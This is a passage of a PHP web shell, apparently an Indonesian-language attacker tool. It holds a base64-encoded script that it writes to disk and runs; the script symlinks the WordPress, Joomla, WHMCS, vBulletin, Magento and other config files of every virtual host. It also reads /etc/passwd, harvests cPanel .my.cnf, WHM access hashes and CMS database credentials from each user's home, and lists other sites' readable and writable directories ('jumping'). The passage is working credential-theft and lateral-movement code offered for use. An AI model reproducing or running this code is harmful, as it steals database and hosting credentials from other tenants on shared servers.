MvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";
661. $file = "idx_config/vhost.cin";
662. $handle = fopen($file ,"w+");
663. fwrite($handle ,base64_decode($vhost));
664. fclose($handle);
665. chmod($file, 0755);
666. if(exe("cd idx_config && ./vhost.cin")) {
667. echo "<center><a href='$link_config/idx_config'><font color=blue>Selesai</font></a></center>";
668. } else {
669. echo "<center><a href='$link_config/idx_config/vhost.cin'><font color=blue>Selesai</font></a></center>";
670. }
671.  
672. } else {
673. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Nggak bisa dibaca bosku /etc/passwd</font></pre>");
674. while($passwd = fgets($etc)) {
675. if($passwd == "" || !$etc) {
676. echo "<font color=red>Nggak bisa dibaca bosku /etc/passwd</font>";
677. } else {
678. preg_match_all('/(.*?):x:/', $passwd, $user_config);
679. foreach($user_config[1] as $user_idx) {
680. $user_config_dir = "/home/$user_idx/public_html/";
681. if(is_readable($user_config_dir)) {
682. $grab_config = array(
683. "/home/$user_idx/.my.cnf" => "cpanel",
684. "/home/$user_idx/.accesshash" => "WHM-accesshash",
685. "$user_config_dir/po-content/config.php" => "Popoji",
686. "$user_config_dir/vdo_config.php" => "Voodoo",
687. "$user_config_dir/bw-configs/config.ini" => "BosWeb",
688. "$user_config_dir/config/koneksi.php" => "Lokomedia",
689. "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
690. "$user_config_dir/clientarea/configuration.php" => "WHMCS",
691. "$user_config_dir/whm/configuration.php" => "WHMCS",
692. "$user_config_dir/whmcs/configuration.php" => "WHMCS",
693. "$user_config_dir/forum/config.php" => "phpBB",
694. "$user_config_dir/sites/default/settings.php" => "Drupal",
695. "$user_config_dir/config/settings.inc.php" => "PrestaShop",
696. "$user_config_dir/app/etc/local.xml" => "Magento",
697. "$user_config_dir/joomla/configuration.php" => "Joomla",
698. "$user_config_dir/configuration.php" => "Joomla",
699. "$user_config_dir/wp/wp-config.php" => "WordPress",
700. "$user_config_dir/wordpress/wp-config.php" => "WordPress",
701. "$user_config_dir/wp-config.php" => "WordPress",
702. "$user_config_dir/admin/config.php" => "OpenCart",
703. "$user_config_dir/slconfig.php" => "Sitelok",
704. "$user_config_dir/application/config/database.php" => "Ellislab");
705. foreach($grab_config as $config => $nama_config) {
706. $ambil_config = file_get_contents($config);
707. if($ambil_config == '') {
708. } else {
709. $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
710. fputs($file_config,$ambil_config);
711. }
712. }
713. }
714. }
715. }
716. }
717. echo "<center><a href='?dir=$dir/idx_config'><font color=blue>Selesai</font></a></center>";
718. }
719. } elseif($_GET['do'] == 'jumping') {
720. $i = 0;
721. echo "<div class='margin: 5px auto;'>";
722. if(preg_match("/hsphere/", $dir)) {
723. $urls = explode("\r\n", $_POST['url']);
724. if(isset($_POST['jump'])) {
725. echo "<pre>";
726. foreach($urls as $url) {
727. $url = str_replace(array("http://","www."), "", strtolower($url));
728. $etc = "/etc/passwd";
729. $f = fopen($etc,"r");
730. while($gets = fgets($f)) {
731. $pecah = explode(":", $gets);
732. $user = $pecah[0];
733. $dir_user = "/hsphere/local/home/$user";
734. if(is_dir($dir_user) === true) {
735. $url_user = $dir_user."/".$url;
736. if(is_readable($url_user)) {
737. $i++;
738. $jrw = "[<font color=blue>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
739. if(is_writable($url_user)) {
740. $jrw = "[<font color=blue>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
741. }
742. echo $jrw."<br>";
743. }
744. }
745. }
746. }
747. if($i == 0) {
748. } else {
749. echo "<br>Total ada ".$i." Kamar di ".$ip;
750. }
751. echo "</pre>";
752. } else {
753. echo '<center>
754. <form method="post">
755. List Domains: <br>
756. <textarea name="url" style="width: 500px; height: 250px;">';
757. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
758. while($getss = fgets($fp)) {
759. echo $getss;
760. }
761. echo '</textarea><br>
762. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
763. </form></center>';
764. }
765. } elseif(preg_match("/vhosts|vhost/", $dir)) {
766. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
767. $urls = explode("\r\n", $_POST['url']);
